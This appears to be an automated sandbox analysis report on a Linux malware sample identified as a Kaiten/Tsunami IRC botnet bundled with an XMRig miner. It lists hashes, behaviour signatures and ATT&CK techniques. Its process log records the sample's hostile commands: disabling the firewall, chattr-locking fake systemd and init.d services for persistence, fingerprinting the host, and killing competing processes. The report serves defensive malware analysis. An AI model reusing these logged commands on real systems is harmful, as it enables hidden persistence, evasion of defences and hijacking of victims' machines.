Analysis
-
max time kernel
55s -
max time network
12s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240522.1-en -
resource tags
-
submitted
03-07-2024 03:03
General
-
Target
f12b3682-6fff-4026-bc66-3b156c781961
-
Size
3.7MB
-
MD5
8b40a86b19a8f3ffec80bcc8e03dc5dd
-
SHA1
21017440a86a230e780d8e851ff42c268d292f64
-
SHA256
3afc8270bfe909376568076567dd7bcab398e766457d5945a3966d224d8c34ab
-
SHA512
c50cbceba5e101ba091a31563e30b8dbe7985d3c0cc64b56362474c91d93187ec282fe265ff877183de7bd8f83e80fbe4c3e68de0e312ae142364a8ae4c9274c
-
SSDEEP
98304:AMAAK4W7MRThAHouqB/cyzN7NCx4sdXVAcFXbPSwasS:2D4WSecXEVBPSwa7
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
-
Detects Kaiten/Tsunami payload 1 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Attempts to change immutable files 19 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 6 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 1 TTPs 1 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 1 TTPs 1 IoCs
-
Changes its process name 1 IoCs
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 12 IoCs
-
Reads system network configuration 1 TTPs 36 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Enumerates kernel/hardware configuration 1 TTPs 63 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/f12b3682-6fff-4026-bc66-3b156c781961/tmp/f12b3682-6fff-4026-bc66-3b156c7819611⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/usr/bin/pgreppgrep -f ksysr2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pgreppgrep -f sysrv2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/bashbash -c "ufw disable"2⤵
-
-
/usr/bin/lsoflsof -t -i :4442⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/lsoflsof -t -i :594752⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/psps -eo "pid,ppid,comm,%cpu" "--sort=-%cpu"2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/chattrchattr +ia /etc/init.d/dpkg-deb-package2⤵
-
-
/etc/init.d/dpkg-deb-package/etc/init.d/dpkg-deb-package start2⤵
- Executes dropped EXE
-
/usr/bin/cpcp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package3⤵
-
-
/usr/bin/rmrm -rf -- dpkg-deb-package3⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/dpkg-deb-package.service2⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
-
-
/usr/bin/systemctlsystemctl enable dpkg-deb-package.service2⤵
-
/lib/systemd/systemd-sysv-install/lib/systemd/systemd-sysv-install enable dpkg-deb-package3⤵
-
/usr/bin/getoptgetopt -o r: --long root: -- enable dpkg-deb-package4⤵
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package enable4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
-
-
/usr/bin/chattrchattr +ia /bin/dpkg-debian2⤵
-
-
/bin/chattrchattr -ia /etc/cron.d/.placeholder2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.d/anacron2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.d/e2scrub_all2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /var/spool/cron/crontabs2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.hourly/.placeholder2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/.placeholder2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/0anacron2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/apport2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/apt-compat2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/cracklib-runtime2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/dpkg2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.daily/man-db2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.weekly/.placeholder2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.weekly/0anacron2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.weekly/man-db2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.monthly/.placeholder2⤵
- Attempts to change immutable files
-
-
/bin/chattrchattr -ia /etc/cron.monthly/0anacron2⤵
- Attempts to change immutable files
-
-
/bin/bashbash -c "find /tmp -type f -regextype egrep -regex '.*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' -exec rm -rf {} +"2⤵
-
-
/bin/findfind /tmp -type f -regextype egrep -regex ".*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}" -exec rm -rf "{}" +2⤵
-
/bin/rmrm -rf /tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 /tmp/f12b3682-6fff-4026-bc66-3b156c7819613⤵
-
-
-
/tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887/tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 /tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
-
-
/var/tmp/-python37-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887/var/tmp/-python37-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 /var/tmp/-python37-bfc31a24-0b29-4d6a-b05b-f2bcc1e268872⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/var/tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887/var/tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 /var/tmp/-bash-bfc31a24-0b29-4d6a-b05b-f2bcc1e26887 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/bin/hostnamehostname -I4⤵
- Attempts to change immutable files
-
-
/bin/awkawk "{print \$1}"4⤵
-
-
/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/bin/headhead -n 14⤵
-
-
/bin/grepgrep "Port "4⤵
-
-
/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/bin/whoamiwhoami4⤵
-
-
/bin/hostnamehostname4⤵
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/bin/sedsed -e "s/\$//"4⤵
-
-
/bin/sedsed -e "s/^ *//"4⤵
-
-
/bin/cutcut -d: -f24⤵
-
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/bin/awkawk "{print \$1}"4⤵
-
-
/bin/awkawk "{print \$4}"4⤵
-
-
/bin/awkawk "{print \$4}"4⤵
-
-
/bin/awkawk "{print \$3}"4⤵
-
-
/bin/awkawk "{print \$4}"4⤵
-
-
/bin/awkawk "{print \$1}"4⤵
-
-
/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/idid -u4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/bin/grepgrep /etc/cron4⤵
-
-
/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/bin/idid -u4⤵
-
-
/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
-
/bin/idid -u4⤵
-
-
/bin/wcwc -l4⤵
-
-
/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
-
/usr/bin/nohupnohup ./dpkg-deb-package1⤵
-
/usr/bin/dpkg-deb-package./dpkg-deb-package1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Hijack Execution Flow
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Hijack Execution Flow
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177B
MD5cb15fc1aeb315b203f6d6c49fc97d754
SHA133baee08c1adf776175ed6f94d9c192d4d36949c
SHA256f33416850da138c66d6054d7a315a0040623326236c1c62d32e94d52aca6f495
SHA5125dffb2864a87b3004971092255948c30996acfeff3b3980bce0adb8bf593fc79a7f1320dc350d86fee166bb74c47fb23928236db04eded85823dc856ea96f834
-
Filesize
366B
MD5906d7ce63c7466c6c65f509156bb1529
SHA11e3dcb514ce8007a594f6805c7bdde98fe2f7667
SHA256e3d6f2b6cc53564780785e6efb9e415b83e40342fe7afe210631fe84fd492476
SHA512f488084c847b471330dbef23bbb7e3c9def2b961a66406d8ae36de9fe168f9ae1c3db3b001f8e58bd2a0dbf91696a8512812a87bb805df71972a76b82e11cd4d
-
Filesize
368B
MD5c4b8df941d21bfdef588739132cd7a14
SHA12ead781a01cc9375ed6c8baab5dfda0cebe1fcfd
SHA25610d05ae87e80189eead21851fdd757b60d7c7710adce029176847516387cfc5e
SHA512bd82c37868c18bbf9c4acde45fb4368d0ac87af741797fca71049f763a665c94651db5e18aed249a99e8b1491c04c476ce1c9039bc8583c89bb071293fe9dae3
-
Filesize
2.3MB
MD5b9f096559e923787ebb1288c93ce2902
SHA194851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA2561fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
Filesize
184KB
MD58a68585066330f536d6fb376d15cfc4f
SHA1587dfdb1a3607af9ed32e0561bbab944f510b17b
SHA256c964791501a48e919446892fe14ed101c27da375668ac7a24de891dc68356f9b
SHA5126a5ec5083e58cc3e70bf8a395c85bf66c913737b17266f24925339b26dfa4d641cc9cd83922ef7e9dc7ed6febfceb171b7e051dd4c4741028e0328a431f080a6